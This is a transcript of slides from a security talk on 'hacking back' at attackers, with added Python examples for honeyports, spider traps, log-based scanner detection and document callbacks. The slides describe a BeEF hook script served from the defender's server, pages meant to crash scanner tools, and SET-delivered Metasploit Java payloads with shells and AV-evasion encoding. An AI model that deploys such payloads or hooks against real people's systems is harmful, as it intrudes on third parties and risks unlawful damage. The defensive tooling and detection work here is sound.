Paul Asadoorian - Bringing Sexy Back

  1. Bringing Sexy Back: Defensive Measures That Actually Work
     Paul Asadoorian (paul@pauldotcom.com)
     John Strand (john@pauldotcom.com)
     http://pauldotcom.com
  2. Paul Asadoorian
  3. (image only)
  4. http://pauldotcom.com
  5. Goal: Bring Sexy Back
  6. Outline
     • # whoami
     • Introduction - OODA, don’t run away
     • Case Studies - reasons why we CAN do this
     • Warning banners - allow you to do things you disclose
     • Annoyance - Mr. Clippy, User Agent, Spider Traps
     • Attribution - BeEF, Metasploit Decloak
     • Attack - SET, Java payloads, purple ASCII art
  7. Introduction
     Yes, I said “Hacking Back” but don’t run away
  8. Disclaimer
     The contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation with your legal team and upper management first.
     Any action you take from this presentation should be documented in writing before implementing.
  9. First off, why are we talking about “hacking back”?
 10. Successful Penetration Tests
     • Most organizations provide easy access to their “intellectual property”
       - How many pen tests have you been on?
       - How many of those were successful?
     • Or?
       - How many women have you dated?
       - How many have you slept with?
 11. Why Are Penetration Tests Always So Successful?
 12. 1. Flimsy Defensive “Layers”
 13. 2. Social Engineering
     Because there is no patch for human stupidity...
 14. 3. Passwords
 15. 4. Software Vulnerabilities
 16. John & Paul Then Thought
     • We can do better
     • What if we were to defend systems, applying what we know about attacks?
     • For so long we’ve gone down the beaten path that we call “security”
     • It’s time to break the mold
     We also thought about how messy we get when eating noodles, but someone beat us to the solution...
 17. Why Use Offensive Counter Measures?
     • There are times where you will be required to do “more”
       - In particular when working with law enforcement
     • The attackers are getting more and more brazen
       - Very little perceived risk on their part
       - We have rules, they don’t follow rules
     • You may need to figure out what an attacker is after or gather information about them
       - e.g. if they are attacking from a botnet or through Tor
 18. OODA
     • Whoever can do these things the fastest lives:
       - Observe
       - Orient
       - Decide
       - Act
     • Originally developed by John Boyd for fighter pilots
     • With current security models how many can you impact?
     • Works both ways: dis-orient attackers!
     (Photo: Paul, “fighting”)
 19. Case Studies
     Stuff other people did that makes what we’re going to do look okay
 20. Case Study: Consent to University Network Terms
     • Sysadmin hacks into threatening machine
       - Gathered evidence used against student using temp/temp creds
       - Student’s consent to university terms justifies sysadmin
       - U.S. v. Heckenkamp
     • Kevin Poulsen, “Court Okays Counter-Hack of eBay Hacker’s Computer,” Threat Level, April 6, 2007
       - http://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html
     “A federal appeals court just shot down an attempt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convictions, which were an end result of information provided by a university sysadmin who broke into Heckenkamp’s computer to gather evidence.”
 21. Case Study: Public Example of Reflected Attack
     • 1999 - World Trade Organization web site
     • DoS attack from E-Hippies Coalition
     • Hosting service Conxion reflected the attack back to E-Hippies and disabled its web site
     • Conxion not prosecuted
       - http://www.networkworld.com/research/2000/0529feat2.html
     “So we told our filtering software to redirect any packets coming from these machines back at the e-hippies Web server”
 22. Case Study: MSFT Court Order – Botnet
     • Civil lawsuit 2010
     • Court issues order to suspend the domains associated with the Waledac botnet
     • MSFT takes “other technical measures” to degrade the botnet
       - www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber-Defense-Law-Botnet-Computer-Crime-Lawsuit
     “Notice that Microsoft is not doing this in the dark. It is working through our open public court system, so that Microsoft is transparent and accountable and all can see what is happening and evaluate it.”
 23. Case Study: DOJ Takes Over 2 Million Node Botnet
     • A judge gave permission to FBI and U.S. Marshals to set up servers to stop the Coreflood botnet
     • They were also given permission “to send commands to infected computers that stops the Coreflood virus”
     • They seized 5 servers and 29 domain names
     • DOJ now owns 2.5 million computers on the Internet, and will essentially tell the malware to self-destruct
     • What, this isn’t sexy enough for you?
 24. Let’s Pretend I’m a Lawyer
     • I’m advising you to:
       - Discuss
       - Document
       - Plan
     • Consult with others, reveal your plans!
     • Hiding intentions means you think what you are doing is “wrong”
     • Rule of thumb: Don’t be evil
       - While it can seem like a lot of fun, it can get you in big trouble
     Note: We love the EFF (eff.org, go donate!)
 25. Okay, Let’s Stop Pretending
     • Could this get you into trouble?
       - Possibly. There is still some debate on how to do it properly
     • There are a few things we can avoid to keep us from getting in trouble
       - Don’t ever put malware where it is publicly accessible
       - Don’t make it too easy to get to
     • Use Warning Banners...
 26. Warning Banners
     Warning, we are going to talk about warning banners...
 27. Look at Your Warning Banner
     • There is a lot in there about permission
     • There are a number of technologies that will “check” your system before it accesses the network
       - OpenVPN scripts (like a NAC check)
       - Windows 2008 Network Access Protection
     • Is it possible to use this as a means to gather some information about an attacker system?
     • Put in your warning banner that you can do what you want!
 28. Example: Eric Needed a Warning Banner
     • What does a kitchen knife, a crutch, and duct tape have to do with anything?
     • It is illegal to set up lethal traps for trespassers
     • However, if you tell them there may be evil things on your network/property, you warned them
     “super went to open the door, felt resistance and found the rigged contraption” -- a big knife duct-taped to a crutch, which was installed with an elastic cord. The super was not injured. Eric Stetz was arrested and charged with reckless endangerment for a vicious-looking booby trap.
     http://gothamist.com/2008/04/06/homemade_booby.php
 29. WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own risk!
     Would this have kept Eric Stetz out of trouble?
 30. FREE VASECTOMY
     This likely would not have kept Eric Stetz out of trouble...
 31. Reality Check: Don’t Be Stupid (like Eric)
     • How could this go wrong for you?
       - Dumb moves (like knife crutches)
       - Easily accessible malware (e.g. traps)
       - Full attacks on attacker IP addresses
       - Purposely damaging systems
       - Persistent long-term access to bad guys
     • We have smarter options to work with
       1. Annoyance
       2. Attribution
       3. Attack
 32. Annoyance
     Stressing out the attackers...
 33. Annoyance: HoneyPorts
     • Forces attackers to make a full connection to avoid spoofing pitfalls
     • Attackers and testers hate this……..

     @echo off
     rem One pass over netstat; rerun it from a scheduled task or an outer loop to keep watching.
     rem Something must be listening on 3333 (a netcat listener will do) or no connection ever completes.
     rem The "find /v LISTENING" filter is added here so the listener's own 0.0.0.0:0 line never becomes a rule.
     for /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^" ^| find /v ^"LISTENING^"') do @for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rule name="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block

     If a machine makes a full TCP connection to port 3333, a firewall rule is added to block the source IP address
 34. Annoyance: HoneyPorts
     • Works on Linux too of course, same concept
     • Must have a working copy of Netcat on your system
     • Should be modified to log entries and report back to the enterprise SIEM

     [root@linux ~]# while true; do
       # traditional netcat -v reports "connect to [...] from host [src] port" on stderr;
       # OpenBSD nc words it differently, so the cut pipeline yields nothing and the guard skips it
       IP=$(nc -v -l -p 2222 2>&1 >/dev/null | grep from | cut -d[ -f3 | cut -d] -f1)
       [ -n "$IP" ] && { logger -t honeyport "full connect from $IP"; iptables -A INPUT -p tcp -s "$IP" -j DROP; }
     done
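The same honeyport idea in Python, added here as an example (it is not the batch or netcat code from the slides). It accepts the full TCP handshake the slides rely on, so a spoofed SYN can never trip it, records one JSON event per hit for the SIEM, and builds the same iptables DROP rule. The allowlist and the `apply_rules` switch are my additions: the one-liners above block whatever connects, including your own vulnerability scanner or the box itself.

```python
"""Honeyport listener: any completed TCP connection to a port nothing legitimate
uses gets its source address dropped (added example, not the talk's own code)."""
import ipaddress
import json
import socket
import subprocess
import threading
import time

# Assumption: addresses that must never be blocked (your own scanners, jump hosts).
DEFAULT_ALLOWLIST = ("127.0.0.0/8", "10.0.0.0/8")


def is_allowlisted(ip, allowlist=DEFAULT_ALLOWLIST):
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in allowlist)


def block_rule(ip):
    """The rule the talk's shell loop adds, as an argv list (-I so it wins)."""
    return ["iptables", "-I", "INPUT", "-p", "tcp", "-s", ip, "-j", "DROP"]


class Honeyport:
    def __init__(self, port=2222, allowlist=DEFAULT_ALLOWLIST, apply_rules=False):
        self.port = port
        self.allowlist = allowlist
        self.apply_rules = apply_rules   # False: decide and log only, never touch iptables
        self.blocked = set()
        self.events = []
        self._sock = None

    def handle(self, src_ip):
        """Decide what a completed handshake from src_ip means; returns the event."""
        event = {"ts": time.time(), "src": src_ip, "port": self.port, "action": "block"}
        if is_allowlisted(src_ip, self.allowlist):
            event["action"] = "allowlisted"
        elif src_ip in self.blocked:
            event["action"] = "already-blocked"
        else:
            self.blocked.add(src_ip)
            if self.apply_rules:
                subprocess.run(block_rule(src_ip), check=False)
        self.events.append(event)
        print(json.dumps(event))   # one JSON line per hit; ship this to the SIEM
        return event

    def start(self, bind="0.0.0.0"):
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock.bind((bind, self.port))
        self._sock.listen(16)
        self.port = self._sock.getsockname()[1]   # real port if 0 was requested
        threading.Thread(target=self._serve, daemon=True).start()
        return self.port

    def _serve(self):
        while True:
            try:
                conn, (src_ip, _) = self._sock.accept()   # accept() returns only after the handshake
            except OSError:                               # socket closed by stop()
                return
            conn.close()   # nothing to read; a lone SYN never gets this far
            self.handle(src_ip)

    def stop(self):
        if self._sock:
            try:
                self._sock.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            self._sock.close()


def demo_local_trip(timeout=2.0):
    """Start a honeyport on a free loopback port, trip it once, return the events."""
    hp = Honeyport(port=0, allowlist=())        # empty allowlist so loopback trips it
    port = hp.start(bind="127.0.0.1")
    socket.create_connection(("127.0.0.1", port)).close()
    deadline = time.time() + timeout
    while not hp.events and time.time() < deadline:
        time.sleep(0.02)
    hp.stop()
    return hp.events


if __name__ == "__main__":
    demo_local_trip()
```

Run it with `apply_rules=True` as root on a host that really has nothing on the port; keep it at the default first and watch the JSON events until you are sure the allowlist covers every scanner, monitor and admin box that is allowed to poke at the machine.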
 35. Annoyance: Mr. Clippy
     • Through PHPIDS we can make attacking a website “interesting”
     • First, install PHPIDS
     • PHPIDS has clipping thresholds
     • Then create a rule that pulls up Mr. Clippy for all attackers
 36. Annoyance: Making Your Website Look Like Something Else
     Oh, you’re IIS? Here are all my IIS attacks!
 37. Annoyance: Filter User-Agent Strings
     • Filter the User-Agents in use by attackers and testers:
       - Nikto, Acunetix, “IamHackingYou”
     • Sites do not lock down the mobile version of the web site
       - There has been a lot of research in this area by Chris John Riley
       - E.g. using the iPhone User-Agent reveals the mobile version of the site
       - Some people don’t secure the mobile version
     • What if you present traps or DoS conditions based on User-Agent?
 38. Annoyance: Messing with Attackers’ Heads

     <?php
     // Robots honeypot: reached only by clients that ignore robots.txt
     $ip        = getenv("REMOTE_ADDR");
     $useragent = getenv("HTTP_USER_AGENT");
     $to        = "yournonproductionemail@example.com";
     $subject   = "Robots honeypot from " . $ip;
     $body      = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;
     mail($to, $subject, $body);
     // the User-Agent is attacker-controlled, so escape it before echoing it back
     $ua_html = htmlspecialchars($useragent, ENT_QUOTES, "UTF-8");
     echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1></html>");
     echo("Your IP address is: " . $ip . "\n");
     echo("Your User Agent is: " . $ua_html . "\n");
     ?>

     Credit Josh Wright: http://mail.pauldotcom.com/pipermail/pauldotcom/2009-February/000713.html
 39. Annoyance: Messing with Attackers’ Heads
     This all happened in the same day!
     Fun part is we get to make things up as to why this happened...
 40. Annoyance: Evil Web Servers
     • Many testers and attackers use automated crawling
       - This helps identify pages and possible insertion points for their attacks
       - If they say they don’t, they are probably lying
     • *Maybe* there is a way to attack the tools
       - Setting up a DoS condition for their automated scanner
     • Note: This is not something you want to try on an external web server that you want to have crawled by Google
       - Configure robots.txt to point to resources you control
       - NOT something you put in your index.php page!
 41. Exploiting Existing Vulnerabilities
     • Acunetix DoS in Sniffer Component
       - http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23507
     • WebInspect crashes loading reports
       - http://seclists.org/educause/2009/q3/526
       “We can run the scans but if you select a report that has critical vulnerabilities in it the report generator crashes with invalid characters.”
     • AppScan vulnerabilities
       - SSL: https://www-304.ibm.com/support/docview.wss?uid=swg1PM24290
       - Login Recording: https://www-304.ibm.com/support/docview.wss?uid=swg1PM04998
 42. Evil Annoyance: Fuzzing Attacker Tools
     • Why not fuzz the attackers’/testers’ tools while they browse you?
     • There are a number of different browser fuzzers available
       - bf3, Sulley, Python
     • We can also use DOM-Hanoi
       - Geared towards browser fuzzing, but hey. It works
       - Actually, it just takes a long time to run
     • Goal: Build a page that consistently crashes the attacker’s tool!
 43. Annoyance: Setting Traps
 44. SpiderTrap & WebLabyrinth
     • Spidertrap: small Python script to trap web spiders
     • Ben Jackson created a PHP version called WebLabyrinth
     • It is PHP so you can load it in your web infrastructure
     • Has a number of cool features
       - Gently tells Googlebot to go away
       - Random HTTP codes
       - *NEW* Database support
       - *NEW* Alerting with IDS-style rules
     • David Bowie approved
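The User-Agent filtering from slide 37 and the labyrinth behaviour from this slide, as one added Python example (it is neither Spidertrap nor WebLabyrinth; the scanner-agent list comes from the talk's own examples, and the `/labyrinth/` prefix, the polite-bot list and the status mix are assumptions). `respond()` is the decision a request handler makes: well-behaved crawlers are told to go away, known scanner agents and anything under the trap prefix get a deterministic, never-ending page of further trap links with a random-looking status code, and every trap hit yields an alert record.

```python
"""Spider trap responder (added example; not the Spidertrap/WebLabyrinth code)."""
import hashlib
import random

TRAP_PREFIX = "/labyrinth/"                                     # assumption: where the trap lives
TRAP_AGENTS = ("nikto", "acunetix", "iamhackingyou", "zmeu")    # agents named on the slides
POLITE_BOTS = ("googlebot", "bingbot")                          # assumption: crawlers to turn away
STATUS_MIX = (200, 200, 200, 301, 302, 403, 404, 500)
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def robots_txt():
    """Disallow the trap: honest crawlers stay out, scanners that ignore it walk in."""
    return "User-agent: *\nDisallow: %s\n" % TRAP_PREFIX


def classify(path, user_agent):
    ua = (user_agent or "").lower()
    if any(bot in ua for bot in POLITE_BOTS):
        return "polite-bot"
    if any(sig in ua for sig in TRAP_AGENTS):
        return "scanner"
    if path.startswith(TRAP_PREFIX):
        return "in-trap"
    return "normal"


def _rng(key):
    # Seeded from the path, so re-requesting a URL yields the same page (a crawler that
    # diffs responses sees a stable site) while every distinct path still differs.
    seed = int(hashlib.sha256(key.encode()).hexdigest()[:16], 16)
    return random.Random(seed)


def labyrinth_page(path, n_links=10):
    """Return (links, html): n_links fresh trap URLs that all lead deeper."""
    rng = _rng(path)
    links = []
    for _ in range(n_links):
        name = "".join(rng.choice(ALPHABET) for _ in range(rng.randint(4, 12)))
        links.append(TRAP_PREFIX + name + rng.choice((".php", ".html", ".asp", "/")))
    html = ("<html><body>\n"
            + "".join('<a href="%s">%s</a>\n' % (link, link) for link in links)
            + "</body></html>\n")
    return links, html


def respond(path, user_agent):
    """(status, headers, body, alert) for one request; alert is None for normal traffic."""
    kind = classify(path, user_agent)
    if kind == "polite-bot":
        return 200, {"X-Robots-Tag": "noindex, nofollow"}, "nothing here\n", None
    if kind == "normal":
        return 404, {}, "not found\n", None      # assumption: real content is served elsewhere
    links, html = labyrinth_page(path)
    status = _rng(path + "#status").choice(STATUS_MIX)
    headers = {"Content-Type": "text/html"}
    if status in (301, 302):
        headers["Location"] = links[0]           # redirects also point back into the maze
    alert = {"kind": kind, "path": path, "ua": user_agent}
    return status, headers, html, alert
```

Wire `respond()` behind the paths robots.txt disallows and feed the alert records to the same place the honeyport events go; the slide's warning about Google applies unchanged, which is why the polite-bot branch exists.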
 45. Prevention: Nessus Example
 46. Keeping it “Real”
 47. Wget: Falling Into The Trap
 48. Now for W3AF
 49. This is Going to Take a While...
     Also annoying
 50. Helps the Internet Be a Better Place?
     The IP address 209.20.92.14 wandered into the labyrinth:
     [17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]
     “/admin” on my server redirects people or bots to the labyrinth:
     209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
     Interesting User Agent, eh?
 51. Helps the Internet Be a Better Place?
     • Turns out “ZmEu” is a popular string for the user agent to contain for bots looking for insecure web applications
     • If the automated bots waste time in my labyrinth, that’s less time they spend attacking other sites
     • It’s also less time they spend on my own site trying lame attacks that likely would not work anyway
     • My “traps” should also spring on some of the following requests as well:
     [client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpmyadmin
     [client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpMyAdmin
     [client 209.190.23.66] File does not exist: /var/lib/mediawiki/dbadmin
     [client 209.190.23.66] File does not exist: /var/lib/mediawiki/myadmin
     [client 209.190.23.66] File does not exist: /var/lib/mediawiki/MyAdmin
 52. Laughing at me or laughing at them?
     • Nice to see attackers are smiling at me, or not
     • Multiple attempts from different IPs across multiple servers
     • About “anti-sec”:
     The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.
     [client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)
     65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
     72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
     89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
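Detection over the access-log lines on the last three slides, as an added Python example (not part of the talk; the regex, the tag names and the one benign line marked "constructed" are mine). It parses Apache combined-format entries, tags the ZmEu user agent, the w00tw00t probe and admin-interface hunting, and groups hits per source IP so the same scanner seen across several servers can be correlated.

```python
"""Flag scanner traffic in Apache access logs (added example, not from the talk)."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
UA_SIGS = {"zmeu": "ua:zmeu", "nikto": "ua:nikto", "acunetix": "ua:acunetix"}
PATH_SIGS = {
    "w00tw00t": "w00tw00t-probe",
    "phpmyadmin": "admin-hunt", "dbadmin": "admin-hunt",
    "myadmin": "admin-hunt", "/admin": "admin-hunt",
}

# The talk's log lines plus one constructed benign request for contrast.
SAMPLE_LOG = """\
65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
198.51.100.5 - - [17/Mar/2011:21:40:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (constructed)"
"""


def parse_line(line):
    """Combined-log line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def tag_request(rec):
    """Sorted, de-duplicated signature tags for one parsed request."""
    ua = rec["ua"].lower()
    path = rec["path"].lower()
    tags = {t for sig, t in UA_SIGS.items() if sig in ua}
    tags |= {t for sig, t in PATH_SIGS.items() if sig in path}
    return sorted(tags)


def scan_log(lines):
    """Map source IP -> list of (timestamp, path, tags) for every flagged request."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                 # unparsable line; count these separately in production
        tags = tag_request(rec)
        if tags:
            hits[rec["ip"]].append((rec["ts"], rec["path"], tags))
    return dict(hits)


def offenders(lines, min_hits=1):
    """Source IPs with at least min_hits flagged requests, most active first."""
    hits = scan_log(lines)
    return sorted((ip for ip, h in hits.items() if len(h) >= min_hits),
                  key=lambda ip: (-len(hits[ip]), ip))


if __name__ == "__main__":
    for ip, entries in scan_log(SAMPLE_LOG.splitlines()).items():
        for ts, path, tags in entries:
            print(ip, ts, path, ",".join(tags))
```

`offenders(lines, min_hits=3)` is the list you would hand to the honeyport's blocklist or to the labyrinth's redirect rule; the benign constructed line never appears in the output because no signature matches it.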
 53. Attribution
     I can still see you...
 54. Protecting Your Intellectual Property
     • “Callbacks” - similar to software updates
       - Sends information back to home base about the system
       - IP address, hardware and software configurations
       - Microsoft Genuine Advantage, crash dumps
     • Tracking software in phones
       - Just look at Android... Does “checkers” really need access to my contact list and call history?
     • We are not necessarily talking about “hacking” per se
       - We are talking about getting attribution
 55. Send my information to Microsoft?
 56. Word Web-Bugs
     • Feature built into exploit frameworks for penetration testing
     • This tactic works great at tracking intellectual property
     • Not all ways of attribution need result in shell access
     • Far less likely to crash a system
     • Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros
     • Callback should go to a closely monitored system
     This is like spy stuff, like James Bond... “Ohhhhhh James...” See, Defense IS Sexy! Eh?
 57. How does it work?
     • It simply inserts a reference to a CSS file served from a system you control, in this case one running Core IMPACT
     • When the doc is opened it tries to open the URL
     • Direct connection!
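The callback side of the web-bug, as an added Python example rather than the Core IMPACT feature the slide shows: each planted file gets its own HMAC-signed token in the callback URL, so a hit on the monitored system says which document was taken, and a guessed or tampered token is rejected instead of logged as a hit. The callback host, the secret and the HTML-with-stylesheet carrier are assumptions; the slide only says the document references a CSS URL.

```python
"""Signed callback tokens for planted documents (added example, not the talk's code)."""
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlencode, urlparse

CALLBACK_BASE = "https://callbacks.example.invalid/s.css"   # assumption: the monitored host
MAC_LEN = 16


class CallbackRegistry:
    def __init__(self, secret):
        self.secret = secret            # assumption: lives only on the monitoring host
        self.docs = {}                  # token -> label of the planted document
        self.hits = []

    def _mac(self, token):
        return hmac.new(self.secret, token.encode(), hashlib.sha256).hexdigest()[:MAC_LEN]

    def plant(self, label):
        """Register a new document and return the unique callback URL to embed in it."""
        token = secrets.token_hex(8)
        self.docs[token] = label
        return "%s?%s" % (CALLBACK_BASE, urlencode({"i": token, "s": self._mac(token)}))

    def callback(self, url, src_ip, user_agent):
        """Handle one request to a callback URL; returns the hit, or None if bogus."""
        qs = parse_qs(urlparse(url).query)
        token = qs.get("i", [""])[0]
        sig = qs.get("s", [""])[0]
        if not hmac.compare_digest(sig, self._mac(token)) or token not in self.docs:
            return None                 # forged or guessed token: no attribution, no alert
        hit = {"doc": self.docs[token], "src": src_ip, "ua": user_agent, "ts": time.time()}
        self.hits.append(hit)
        return hit


def planted_html(label, url):
    """Carrier document. Assumption: an HTML file saved under a .doc/.xls name; when the
    office suite opens it, it fetches the stylesheet, which is the 'direct connection'."""
    return ('<html><head><title>%s</title>'
            '<link rel="stylesheet" type="text/css" href="%s"></head>'
            '<body>Loading...</body></html>' % (label, url))
```

The `src` and `ua` of a hit are what the slide means by attribution; the token is what turns "someone opened a bugged file" into "the file named SSN.xls left the share at this time", and the MAC keeps a curious attacker from spraying the callback endpoint with made-up tokens to flood your alerts.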
 58. Web Application Street Fighting
     • How can we use JavaScript against the attackers?
     • BeEF (Browser Exploitation Framework)
       - Harvest information
       - Send direct links
       - Possibly exploit their systems (XMLRPC)
     • Maybe we could just mess with them
       - Send indications of XSS and SQLi in every response to their attacks
     • We need to have a wide variety of tools and techniques
 59. (image only)
 60. BeEF: Get the attacker to connect
     • Lead the attacker to a decoy site that no legit user would visit
     • Example robots.txt:
       User-agent: *
       Disallow: /admin/admin.php
     • Example: admin.php displays a bogus login page
     • Hidden in admin.php is “The Hook”:
       <script type="text/javascript" src="http://<your server>/beef/hook/beefmagic.js.php"></script>
     I like ninja grappling hooks....
 61. (image only)
 62. (image only)
 63. Hooked on BeEF: Now what?
     • Capabilities are broad
       - Gather info
       - Browser type and version, OS type and version, screen resolution, etc.
       - Simple popup:
 64. Attackers use IIS 6.0? No Way!
 65. BeEF Modules
     • The issue is deciding how far to go
       - Do you cross the line between info gathering and attacking the attacker(s) system?
       - You can do that with BeEF, not saying that you should, but you can if you have permission
     • Cross the line: many built-in modules
       - Metasploit integration: Browser Autopwn, SMB Challenge Theft, etc.
       - DoS may be okay, and this seems like a good place to build a DoS for your favorite, or not so favorite, hacking tool
       - Example: Find an exploit for Nikto and put it into BeEF
 66. BeEF Modules (2)
     Send them to your competition
     Who are they really? How are they hiding? Who else have they hacked?
 67. Attribution: Decloak
     • From the Metasploit project
       - More information: http://decloak.net/
       - Great place to redirect users from robots.txt
       - Many attackers and penetration testers will use proxies and/or Tor to hide their IP address
       - Decloak can reveal the real IP address of the scanner
     “This tool demonstrates a system for identifying the real IP address of a web user, regardless of proxy settings, using a combination of client-side technologies and custom services.”
 68. Looking at the Components of Decloak
 69. Now, for Java
 70. The DNS Server
 71. Compile and Start
 72. Now, Surf to Your Linux System
 73. Checking the Database
 74. Viewing the Data
 75. Wireless Countermeasure Example
     • Step 1: Set up a hidden SSID (“private” or “guest”)
     • Step 2: Use a captive portal when people connect to it
     • Step 3: Portal login page contains BeEF hook or SET exploit (use your warning banner!)
     • Step 4: Collect information about attacker (dissolvable agents)
     • Step 5: (OPTIONAL) Ban Wi-Fi MAC on WIPS and/or wireless network (works until they change it)
 76. Gotchas
     • Make sure the SSID has access to nothing, or just more honeypots
     • Tough one: prevent real users from connecting to it
     • Tougher one: make attackers think it’s a real SSID & network
     • Danger: make sure your BeEF server is not a jumping-off point
     Pwning yourself is not fun
 77. Wireless: More Thoughts
     • Send wireless driver exploits on the network, triggered by some event
       - Easily will backfire...
     • Answer to clients probing for non-production networks, send them to a page that tells them they are mis-configured (beat the attackers to it)
       - May really piss off users
     • Bluetooth Canary - leave a Bluetooth phone with OBEX enabled
       - Have an address book with numbers that all route to you
 78. Attack
     Gopher is an old protocol too...
 79. Attack: Java Payload
     • If we can get an attacker to load a Java payload, why not give them something interesting, like a Metasploit payload?
     • Java payloads are awesome for penetration testers, no vulnerabilities required!
     • They can also be useful for attackers...
     Just for @beaker and @attrition
 80. Evil Java Application
     • Embed a malicious Java application in a non-production web server
       - Usually in a directory that is Disallowed in robots.txt and/or marked noindex/nofollow
     • The attacker/victim will get a pop-up asking if they want to open the Java application
       - They will, attackers tend to be very curious
       - The payload can be flexible (shell, rootkit, VNC)
     • You can automatically run enumeration scripts when the attacker/victim runs the application
 81. Browsing to Your Site
     http://[Your Linux IP]
     Everyone clicks “Run”
 82. Configuring SET
     Dave Kennedy, the author of SET, loves purple.
 83. Website Attacks are Key
 84. Using Java... Glorious Java
 85. Default Templates
 86. Choosing your Payload
 87. Encoding to Dodge AV
 88. You Say YES!!
 89. Have Your Backtrack System Surf to SET
 90. Not Pretty.. But it Works
 91. Precautions and Usage
     • Put this on the inside of the network
     • Be careful an attacker doesn’t redirect your users
     • Make sure no one can take over your Metasploit instance
     • You don’t have to do anything with the shell
       - You can autorun certain non-damaging commands
       - ping your system
 92. Listen
     - http://pauldotcom.com/radio (24/7)
     - Podcast in iTunes (audio/video)
     Watch
     - Live! http://pauldotcom.com/live
     - “TV” http://pauldotcom.blip.tv
 93. Participate
     - Mailing List: http://mail.pauldotcom.com
     - Community: http://pauldotcom.com/insider
     - IRC: irc.freenode.net #pauldotcom
     Read
     - http://pauldotcom.com (Blog)
     - Email us psw@pauldotcom.com
 94. Want More? (Shameless Plug)
     OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK
     Black Hat Las Vegas 2011 - Register Today!
 95. The End
     Wake up, time for Questions?